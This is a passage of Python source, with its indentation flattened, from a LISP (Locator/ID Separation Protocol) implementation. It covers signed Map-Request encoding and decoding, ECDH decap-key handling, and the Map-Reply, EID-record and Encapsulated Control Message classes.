if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data.encode())
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig.decode() }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
sig_data = sig_data.encode()
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string.encode()
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 4): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if ("source-eid" not in json_string): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if ("signature-eid" not in json_string): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if ("signature" not in json_string): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == None): return(None)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (addr_str in rloc_keys): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (addr_str in lisp_crypto_keys_by_rloc_decap):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply(object):
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (self.nonce in lisp_crypto_keys_by_nonce):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record(object):
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm(object):
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
